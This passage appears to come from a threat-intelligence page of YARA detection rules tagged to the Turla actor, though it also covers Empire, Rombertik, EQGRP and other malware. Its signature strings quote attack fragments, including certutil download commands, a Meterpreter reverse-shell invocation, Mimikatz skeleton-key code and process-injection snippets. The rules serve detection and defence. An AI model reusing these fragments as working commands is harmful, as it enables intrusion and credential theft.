YARA rules for Turla
157 rules · scoped to actor · back to Turla
YARA rules whose family, name, or description matches this actor or its tooling. Use these for binary-pattern hunts.
rule Batch_Script_To_Run_PsExec {
meta:
author = "NCSC"
description = "Detects malicious batch file from NCSC report"
reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
date = "2018/04/06"
hash = "b7d7c4bc8f9fd0e461425747122a431f93062358ed36ce281147998575ee1a18"
id = "1fbeeec8-a5bd-569e-b435-c7d82d32e47b"
strings:
$ = "Tokens=1 delims=" ascii
$ = "SET ws=%1" ascii
$ = "Checking %ws%" ascii
$ = "%TEMP%\\%ws%ns.txt" ascii
$ = "ps.exe -accepteula" ascii
condition:
3 of them
}
rule EQGRP_epicbanana_2_1_0_1 {
meta:
description = "EQGRP Toolset Firewall - file epicbanana_2.1.0.1.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Research"
date = "2016-08-16"
hash1 = "4b13cc183c3aaa8af43ef3721e254b54296c8089a0cd545ee3b867419bb66f61"
id = "cc3346bd-0347-5cf3-b946-5c017d68d93e"
strings:
$s1 = "failed to create version-specific payload" fullword ascii
$s2 = "(are you sure you did \"make [version]\" in versions?)" fullword ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_user_tool_epichero {
meta:
description = "Auto-generated rule - file user.tool.epichero.COMMON"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
hash1 = "679d194c32cbaead7281df9afd17bca536ee9d28df917b422083ae8ed5b5c484"
id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
strings:
$x2 = "-irtun TARGET_IP ISH_CALLBACK_PORT"
$x3 = "-O REVERSE_SHELL_CALLBACK_PORT -w HIDDEN_DIR" fullword ascii
condition:
1 of them
}
rule Empire_ReflectivePick_x64_orig {
meta:
description = "Detects Empire component - file ReflectivePick_x64_orig.dll"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
modified = "2022-12-21"
hash1 = "a8c1b108a67e7fc09f81bd160c3bafb526caf3dbbaf008efb9a96f4151756ff2"
id = "cd69a149-d881-5f93-9647-84241bd96ba5"
strings:
$a1 = "\\PowerShellRunner.pdb" ascii
$a2 = "PowerShellRunner.dll" fullword wide
$s1 = "ReflectivePick" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 400KB and 1 of ($a*) and $s1
}
rule Casper_SystemInformation_Output {
meta:
description = "Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://goo.gl/VRJNLo"
date = "2015/03/06"
score = 70
id = "aaae200c-7ef1-52eb-be5b-36e0ad29ecef"
strings:
$a0 = "***** SYSTEM INFORMATION ******"
$a1 = "***** SECURITY INFORMATION ******"
$a2 = "Antivirus: "
$a3 = "Firewall: "
$a4 = "***** EXECUTION CONTEXT ******"
$a5 = "Identity: "
$a6 = "<CONFIG TIMESTAMP="
condition:
all of them
}
rule Dos_netstat {
meta:
description = "Chinese Hacktool Set - file netstat.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://tools.zjqhr.com/"
date = "2015-06-13"
hash = "d0444b7bd936b5fc490b865a604e97c22d97e598"
id = "bc3141bf-4e82-5aa4-a8a6-a0a4586ee9a1"
strings:
$s0 = "w03a2409.dll" fullword ascii
$s1 = "Retransmission Timeout Algorithm = unknown (%1!u!)" fullword wide /* Goodware String - occured 2 times */
$s2 = "Administrative Status = %1!u!" fullword wide /* Goodware String - occured 2 times */
$s3 = "Packet Too Big %1!-10u! %2!-10u!" fullword wide /* Goodware String - occured 2 times */
condition:
uint16(0) == 0x5a4d and filesize < 150KB and all of them
}
rule Certutil_Decode_OR_Download {
meta:
description = "Certutil Decode"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Internal Research"
score = 40
date = "2017-08-29"
modified = "2026-04-01"
id = "63bdefd2-225a-56d5-b615-5e236c97f050"
strings:
$a1 = "certutil -decode " ascii wide
$a2 = "certutil -decode " ascii wide
$a3 = "certutil.exe -decode " ascii wide
$a4 = "certutil.exe -decode " ascii wide
$a5 = "certutil -urlcache -split -f http" ascii wide
$a6 = "certutil.exe -urlcache -split -f http" ascii wide
$fp_msi = { 52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00 72 00 79 }
$fp_doc = "https://docs.aws.amazon.com" ascii
condition:
filesize < 700KB
and 1 of ($a*)
and not 1 of ($fp*)
}
rule APT_Cloaked_CERTUTIL {
meta:
description = "Detects a renamed certutil.exe utility that is often used to decode encoded payloads"
author = "Florian Roth (Nextron Systems)"
reference = "Internal Research"
date = "2018-09-14"
modified = "2022-06-27"
id = "13943cda-6bb1-5c6c-8e55-e8d4bba1ffef"
strings:
$s1 = "-------- CERT_CHAIN_CONTEXT --------" fullword ascii
$s5 = "certutil.pdb" fullword ascii
$s3 = "Password Token" fullword ascii
condition:
uint16(0) == 0x5a4d and all of them
and not filename contains "certutil"
and not filename contains "CertUtil"
and not filename contains "Certutil"
and not filepath contains "\\Bromium\\"
}
rule Binary_Drop_Certutil {
meta:
description = "Drop binary as base64 encoded cert trick"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/9DNn8q"
date = "2015-07-15"
score = 70
id = "19791e51-d041-524d-80fa-9f3ec54eb084"
strings:
$s0 = "echo -----BEGIN CERTIFICATE----- >" ascii
$s1 = "echo -----END CERTIFICATE----- >>" ascii
$s2 = "certutil -decode " ascii
condition:
filesize < 10KB and all of them
}
rule Gazer_certificate_subject {
meta:
description = "Detects Tura's Gazer malware"
author = "ESET"
reference = "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/"
date = "30.08.2017"
id = "4eace653-003e-5cae-9db8-f26502f35fc4"
condition:
for any i in (0..pe.number_of_signatures - 1):
(
pe.signatures[i].subject contains "Solid Loop" or
pe.signatures[i].subject contains "Ultimate Computer Support"
)
}
rule Gazer_certificate {
meta:
description = "Detects Tura's Gazer malware"
author = "ESET"
reference = "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/"
date = "30.08.2017"
id = "4eace653-003e-5cae-9db8-f26502f35fc4"
strings:
$certif1 = { 52 76 a4 53 cd 70 9c 18 da 65 15 7e 5f 1f de 02 }
$certif2 = { 12 90 f2 41 d9 b2 80 af 77 fc da 12 c6 b4 96 9c }
condition:
uint16(0) == 0x5a4d and 1 of them and filesize < 2MB
}
rule Gazer_logfile_name {
meta:
description = "Detects Tura's Gazer malware"
author = "ESET"
reference = "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/"
date = "30.08.2017"
id = "c10d440f-dc9e-54c8-b329-9f22cba05e86"
strings:
$s1 = "CVRG72B5.tmp.cvr"
$s2 = "CVRG1A6B.tmp.cvr"
$s3 = "CVRG38D9.tmp.cvr"
condition:
uint16(0) == 0x5a4d and 1 of them
}
rule TurlaMosquito_Mal_1 {
meta:
description = "Detects malware sample from Turla Mosquito report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
date = "2018-02-22"
hash1 = "b295032919143f5b6b3c87ad22bcf8b55ecc9244aa9f6f88fc28f36f5aa2925e"
id = "1395509a-72f5-56c0-895c-3e9f15829de1"
strings:
$s1 = "Pipetp" fullword ascii
$s2 = "EStOpnabn" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 2000KB and (
pe.imphash() == "169d4237c79549303cca870592278f42" or
all of them
)
}
rule TurlaMosquito_Mal_2 {
meta:
description = "Detects malware sample from Turla Mosquito report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
date = "2018-02-22"
hash1 = "68c6e9dea81f082601ae5afc41870cea3f71b22bfc19bcfbc61d84786e481cb4"
hash2 = "05254971fe3e1ca448844f8cfcfb2b0de27e48abd45ea2a3df897074a419a3f4"
id = "d23d9fe1-26e3-5012-8a88-61ebbc3fbd8f"
strings:
$s1 = ".?AVFileNameParseException@ExecuteFile@@" fullword ascii
$s3 = "no_address" fullword wide
$s6 = "SRRRQP" fullword ascii
$s7 = "QWVPQQ" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 600KB and (
pe.imphash() == "cd918073f209c5da7a16b6c125d73746" or
all of them
)
}
rule TurlaMosquito_Mal_3 {
meta:
description = "Detects malware sample from Turla Mosquito report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
date = "2018-02-22"
hash1 = "443cd03b37fca8a5df1bbaa6320649b441ca50d1c1fcc4f5a7b94b95040c73d1"
id = "c83e0a93-3f8d-572d-ac1a-92fef0b3d3f6"
strings:
$x1 = "InstructionerDLL.dll" fullword ascii
$s1 = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" fullword wide
$s2 = "/scripts/m/query.php?id=" fullword wide
$s3 = "SELECT * FROM AntiVirusProduct" fullword ascii
$s4 = "Microsoft Update" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 400KB and (
pe.imphash() == "88488fe0b8bcd6e379dea6433bb5d7d8" or
( pe.exports("InstallRoutineW") and pe.exports("StartRoutine") ) or
$x1 or
3 of them
)
}
rule TurlaMosquito_Mal_4 {
meta:
description = "Detects malware sample from Turla Mosquito report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
date = "2018-02-22"
hash1 = "b362b235539b762734a1833c7e6c366c1b46474f05dc17b3a631b3bff95a5eec"
id = "1d5c32b3-0316-525c-9386-222917144251"
condition:
uint16(0) == 0x5a4d and filesize < 800KB and pe.imphash() == "17b328245e2874a76c2f46f9a92c3bad"
}
rule TurlaMosquito_Mal_5 {
meta:
description = "Detects malware sample from Turla Mosquito report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
date = "2018-02-22"
hash1 = "26a1a42bc74e14887616f9d6048c17b1b4231466716a6426e7162426e1a08030"
id = "9f3a35c9-b0f0-5ca6-8b34-19e2d45305f2"
condition:
uint16(0) == 0x5a4d and filesize < 300KB and pe.imphash() == "ac40cf7479f53a4754ac6481a4f24e57"
}
rule TurlaMosquito_Mal_6 {
meta:
description = "Detects malware sample from Turla Mosquito report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
date = "2018-02-22"
hash1 = "b79cdf929d4a340bdd5f29b3aeccd3c65e39540d4529b64e50ebeacd9cdee5e9"
id = "1c320b60-ec7a-5f87-b871-f55924351f8f"
strings:
$a1 = "/scripts/m/query.php?id=" fullword wide
$a2 = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" fullword wide
$a3 = "GetUserNameW fails" fullword wide
$s1 = "QVSWQQ" fullword ascii
$s2 = "SRRRQP" fullword ascii
$s3 = "QSVVQQ" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 500KB and (
2 of ($a*) or
4 of them
)
}
rule APT_TurlaMosquito_MAL_Oct22_1 {
meta:
description = "Detects Turla Mosquito malware"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
date = "2022-10-25"
score = 80
hash1 = "6b9e48e3f4873cfb95639d9944fe60e3b056daaa2ea914add14c982e3e11128b"
hash2 = "b868b674476418bbdffbe0f3d617d1cce4c2b9dae0eaf3414e538376523e8405"
hash3 = "e7fd14ca45818044690ca67f201cc8cfb916ccc941a105927fc4c932c72b425d"
id = "f5ad0c0f-81ca-5157-aefb-ead049ada30d"
strings:
$s1 = "Logger32.dll" ascii fullword
$s4 = " executing %u command on drive %martCommand : CWin32ApiErrorExce" wide
$s5 = "Unsupported drive!!!" ascii fullword
$s7 = "D:\\Build_SVN\\PC_MAGICIAN_4." ascii fullword
$op1 = { 40 cc 8b 8b 06 cc 55 00 70 8b 10 10 33 51 04 46 04 64 }
$op2 = { c3 10 e8 50 04 00 cc ff 8d 00 69 8d 75 ff 68 ec 6a 4d }
$op3 = { e8 64 a1 6e 00 64 a1 c2 04 08 75 40 73 1d 8b ff cc 10 89 cc 8b c3 cc af }
condition:
uint16(0) == 0x5a4d and
filesize < 2000KB and
(
pe.imphash() == "073235ae6dfbb1bf5db68a039a7b7726" or
all of them
)
}
rule apt_RU_Turla_Kazuar_DebugView_peFeatures
{
meta:
description = "Turla mimicking SysInternals Tools- peFeatures"
reference = "https://www.epicturla.com/blog/sysinturla"
version = "2.0"
author = "JAG-S"
score = 85
hash1 = "1749c96cc1a4beb9ad4d6e037e40902fac31042fa40152f1d3794f49ed1a2b5c"
hash2 = "44cc7f6c2b664f15b499c7d07c78c110861d2cc82787ddaad28a5af8efc3daac"
id = "0a1675c0-8645-5288-9ef6-e68ffbfe0c3b"
condition:
uint16(0) == 0x5a4d
and
(
pe.version_info["LegalCopyright"] == "Test Copyright"
and
(
(
pe.version_info["ProductName"] == "Sysinternals DebugView"
and
pe.version_info["Description"] == "Sysinternals DebugView"
)
or
(
pe.version_info["FileVersion"] == "4.80.0.0"
and
pe.version_info["Comments"] == "Sysinternals DebugView"
)
or
(
pe.version_info["OriginalName"] contains "DebugView.exe"
and
pe.version_info["InternalName"] contains "DebugView.exe"
)
or
(
pe.version_info["OriginalName"] == "Agent.exe"
and
pe.version_info["InternalName"] == "Agent.exe"
)
)
)
}
rule APT_MAL_RU_Turla_Kazuar_May20_1 {
meta:
description = "Detects Turla Kazuar malware"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.epicturla.com/blog/sysinturla"
date = "2020-05-28"
hash1 = "1749c96cc1a4beb9ad4d6e037e40902fac31042fa40152f1d3794f49ed1a2b5c"
hash2 = "1fca5f41211c800830c5f5c3e355d31a05e4c702401a61f11e25387e25eeb7fa"
hash3 = "2d8151dabf891cf743e67c6f9765ee79884d024b10d265119873b0967a09b20f"
hash4 = "44cc7f6c2b664f15b499c7d07c78c110861d2cc82787ddaad28a5af8efc3daac"
id = "cd0d1fa2-5303-55f8-90a7-4a699ec79230"
strings:
$s1 = "Sysinternals" ascii fullword
$s2 = "Test Copyright" wide fullword
$op1 = { 0d 01 00 08 34 2e 38 30 2e 30 2e 30 00 00 13 01 }
condition:
uint16(0) == 0x5a4d and
filesize < 2000KB and
all of them
}
rule Turla_KazuarRAT {
meta:
description = "Detects Turla Kazuar RAT described by DrunkBinary"
author = "Markus Neis / Florian Roth"
reference = "https://twitter.com/DrunkBinary/status/982969891975319553"
date = "2018-04-08"
hash1 = "6b5d9fca6f49a044fd94c816e258bf50b1e90305d7dab2e0480349e80ed2a0fa"
hash2 = "7594fab1aadc4fb08fb9dbb27c418e8bc7f08dadb2acf5533dc8560241ecfc1d"
hash3 = "4e5a86e33e53931afe25a8cb108f53f9c7e6c6a731b0ef4f72ce638d0ea5c198"
id = "147cc7b7-6dbd-51a2-9501-bcbaec32e20e"
strings:
$x1 = "~1.EXE" wide
$s2 = "dl32.dll" fullword ascii
$s3 = "HookProc@" ascii
$s4 = "0`.wtf" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 20KB and (
pe.imphash() == "682156c4380c216ff8cb766a2f2e8817" or
2 of them )
}
rule Rombertik_CarbonGrabber {
meta:
description = "Detects CarbonGrabber alias Rombertik - file Copy#064046.scr"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://blogs.cisco.com/security/talos/rombertik"
date = "2015-05-05"
hash1 = "2f9b26b90311e62662c5946a1ac600d2996d3758"
hash2 = "aeb94064af2a6107a14fd32f39cb502e704cd0ab"
hash3 = "c2005c8d1a79da5e02e6a15d00151018658c264c"
hash4 = "98223d4ec272d3a631498b621618d875dd32161d"
id = "b3aee336-9f3b-5fae-928d-8357408a7b69"
strings:
$x1 = "ZwGetWriteWatch" fullword ascii
$x2 = "OutputDebugStringA" fullword ascii
$x3 = "malwar" fullword ascii
$x4 = "sampl" fullword ascii
$x5 = "viru" fullword ascii
$x6 = "sandb" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 5MB and all of them
}
rule Rombertik_CarbonGrabber_Panel_InstallScript {
meta:
description = "Detects CarbonGrabber alias Rombertik panel install script - file install.php"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://blogs.cisco.com/security/talos/rombertik"
date = "2015-05-05"
hash = "cd6c152dd1e0689e0bede30a8bd07fef465fbcfa"
id = "f6c04e27-bbab-5012-a4f9-71d49d252b83"
strings:
$s0 = "$insert = \"INSERT INTO `logs` (`id`, `ip`, `name`, `host`, `post`, `time`, `bro" ascii
$s3 = "`post` text NOT NULL," fullword ascii
$s4 = "`host` text NOT NULL," fullword ascii
$s5 = ") ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=5 ;\" ;" fullword ascii
$s6 = "$db->exec($columns); //or die(print_r($db->errorInfo(), true));;" fullword ascii
$s9 = "$db->exec($insert);" fullword ascii
$s10 = "`browser` text NOT NULL," fullword ascii
$s13 = "`ip` text NOT NULL," fullword ascii
condition:
filesize < 3KB and all of them
}
rule Rombertik_CarbonGrabber_Panel {
meta:
description = "Detects CarbonGrabber alias Rombertik Panel - file index.php"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://blogs.cisco.com/security/talos/rombertik"
date = "2015-05-05"
hash = "e6e9e4fc3772ff33bbeeda51f217e9149db60082"
id = "f6c04e27-bbab-5012-a4f9-71d49d252b83"
strings:
$s0 = "echo '<meta http-equiv=\"refresh\" content=\"0;url=index.php?a=login\">';" fullword ascii
$s1 = "echo '<meta http-equiv=\"refresh\" content=\"2;url='.$website.'/index.php?a=login" ascii
$s2 = "header(\"location: $website/index.php?a=login\");" fullword ascii
$s3 = "$insertLogSQL -> execute(array(':id' => NULL, ':ip' => $ip, ':name' => $name, ':" ascii
$s16 = "if($_POST['username'] == $username && $_POST['password'] == $password){" fullword ascii
$s17 = "$SQL = $db -> prepare(\"TRUNCATE TABLE `logs`\");" fullword ascii
condition:
filesize < 46KB and all of them
}
rule Rombertik_CarbonGrabber_Builder {
meta:
description = "Detects CarbonGrabber alias Rombertik Builder - file Builder.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://blogs.cisco.com/security/talos/rombertik"
date = "2015-05-05"
hash = "b50ecc0ba3d6ec19b53efe505d14276e9e71285f"
id = "3233c139-ac06-576c-9870-51306d5aa385"
strings:
$s0 = "c:\\users\\iden\\documents\\visual studio 2010\\Projects\\FormGrabberBuilderC++" ascii
$s1 = "Host(www.panel.com): " fullword ascii
$s2 = "Path(/form/index.php?a=insert): " fullword ascii
$s3 = "FileName: " fullword ascii
$s4 = "~Rich8" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 35KB and all of them
}
rule Rombertik_CarbonGrabber_Builder_Server {
meta:
description = "Detects CarbonGrabber alias Rombertik Builder Server - file Server.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://blogs.cisco.com/security/talos/rombertik"
date = "2015-05-05"
hash = "895fab8d55882eac51d4b27a188aa67205ff0ae5"
id = "742003a2-3716-5ad9-a720-b9e2be71554a"
strings:
$s0 = "C:\\WINDOWS\\system32\\svchost.exe" fullword ascii
$s3 = "Software\\Microsoft\\Windows\\Currentversion\\RunOnce" fullword ascii
$s4 = "chrome.exe" fullword ascii
$s5 = "firefox.exe" fullword ascii
$s6 = "chrome.dll" fullword ascii
$s7 = "@KERNEL32.DLL" fullword wide
$s8 = "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome" ascii
$s10 = "&post=" fullword ascii
$s11 = "&host=" fullword ascii
$s12 = "Ws2_32.dll" fullword ascii
$s16 = "&browser=" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 250KB and 8 of them
}
rule RUAG_Cobra_Malware {
meta:
description = "Detects a malware mentioned in the RUAG Case called Carbon/Cobra"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/N5MEj0"
score = 60
id = "dd2d591f-6f56-5c31-9f3c-3aa7d174c9a0"
strings:
$s1 = "\\Cobra\\Release\\Cobra.pdb" ascii
condition:
uint16(0) == 0x5a4d and $s1
}
rule generic_carbon
{
meta:
author = "ESET Research"
date = "2017-03-30"
description = "Turla Carbon malware"
reference = "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/"
source = "https://github.com/eset/malware-ioc/"
contact = "github@eset.com"
license = "BSD 2-Clause"
id = "efdc0d16-a974-5c00-a401-391d60f3081e"
strings:
$s1 = "ModStart"
$t1 = "STOP|OK"
$t2 = "STOP|KILL"
condition:
(uint16(0) == 0x5a4d) and (1 of ($s*)) and (1 of ($t*))
}
rule carbon_metadata
{
meta:
author = "ESET Research"
date = "2017-03-30"
description = "Turla Carbon malware"
reference = "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/"
source = "https://github.com/eset/malware-ioc/"
contact = "github@eset.com"
license = "BSD 2-Clause"
id = "976b6a7d-00bf-5d0f-baf9-84fc5dbd21a2"
condition:
(pe.version_info["InternalName"] contains "SERVICE.EXE" or
pe.version_info["InternalName"] contains "MSIMGHLP.DLL" or
pe.version_info["InternalName"] contains "MSXIML.DLL")
and pe.version_info["CompanyName"] contains "Microsoft Corporation"
}
rule Empire_Invoke_BypassUAC {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-BypassUAC.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "ab0f900a6915b7497313977871a64c3658f3e6f73f11b03d2d33ca61305dc6a8"
id = "8454d929-e184-5be1-b61f-4dfa8f44bdda"
strings:
$s1 = "$WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory" fullword ascii
$s2 = "$proc = Start-Process -WindowStyle Hidden notepad.exe -PassThru" fullword ascii
$s3 = "$Payload = Invoke-PatchDll -DllBytes $Payload -FindString \"ExitThread\" -ReplaceString \"ExitProcess\"" fullword ascii
$s4 = "$temp = [System.Text.Encoding]::UNICODE.GetBytes($szTempDllPath)" fullword ascii
condition:
filesize < 1200KB and 3 of them
}
rule Empire_lib_modules_trollsploit_message {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file message.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "71f2258177eb16eafabb110a9333faab30edacf67cb019d5eab3c12d095655d5"
id = "cb0eee5a-c236-512e-8256-7411a7fb1fd5"
strings:
$s1 = "script += \" -\" + str(option) + \" \\\"\" + str(values['Value'].strip(\"\\\"\")) + \"\\\"\"" fullword ascii
$s2 = "if option.lower() != \"agent\" and option.lower() != \"computername\":" fullword ascii
$s3 = "[String] $Title = 'ERROR - 0xA801B720'" fullword ascii
$s4 = "'Value' : 'Lost contact with the Domain Controller.'" fullword ascii
condition:
filesize < 10KB and 3 of them
}
rule Empire_Persistence {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file Persistence.psm1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "ae8875f7fcb8b4de5cf9721a9f5a9f7782f7c436c86422060ecdc5181e31092f"
id = "0f63b5f4-f933-5821-b0b0-50717e75f6d9"
strings:
$s1 = "C:\\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -V" ascii
$s2 = "# Execute the following to remove the user-level persistent payload" fullword ascii
$s3 = "$PersistantScript = $PersistantScript.ToString().Replace('EXECUTEFUNCTION', \"$PersistenceScriptName -Persist\")" fullword ascii
condition:
filesize < 108KB and 1 of them
}
rule Empire_portscan {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file portscan.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "b355efa1e7b3681b1402e22c58ce968795ef245fd08a0afb948d45c173e60b97"
id = "23a0f769-9155-5aa0-9200-2baf827bdda4"
strings:
$s1 = "script += \"Invoke-PortScan -noProgressMeter -f\"" fullword ascii
$s2 = "script += \" | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-Str" ascii
condition:
filesize < 14KB and all of them
}
rule Empire_Invoke_Shellcode {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438"
id = "41788f71-cc99-50b3-bdc7-17b132ab2767"
strings:
$s1 = "C:\\PS> Invoke-Shellcode -ProcessId $Proc.Id -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 443 -Verbos" ascii
$s2 = "\"Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!\" ) )" fullword ascii
$s3 = "$RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)" fullword ascii
condition:
filesize < 100KB and 1 of them
}
rule Empire_Write_HijackDll {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file Write-HijackDll.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "155fa7168e28f15bb34f67344f47234a866e2c63b3303422ff977540623c70bf"
id = "6a80af21-fb01-5996-b14d-44ff55b7fb3e"
strings:
$s1 = "$DllBytes = Invoke-PatchDll -DllBytes $DllBytes -FindString \"debug.bat\" -ReplaceString $BatchPath" fullword ascii
$s2 = "$DllBytes32 = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBw" ascii
$s3 = "[Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes32)" fullword ascii
condition:
filesize < 500KB and 2 of them
}
rule Empire_skeleton_key {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file skeleton_key.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "3d02f16dcc38faaf5e97e4c5dbddf761f2816004775e6af8826cde9e29bb750f"
id = "d508e09e-13e8-5866-bb5b-0d886f960bb5"
strings:
$s1 = "script += \"Invoke-Mimikatz -Command '\\\"\" + command + \"\\\"';\"" fullword ascii
$s2 = "script += '\"Skeleton key implanted. Use password \\'mimikatz\\' for access.\"'" fullword ascii
$s3 = "command = \"misc::skeleton\"" fullword ascii
$s4 = "\"ONLY APPLICABLE ON DOMAIN CONTROLLERS!\")," fullword ascii
condition:
filesize < 6KB and 2 of them
}
rule Empire_invoke_wmi {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file invoke_wmi.py"
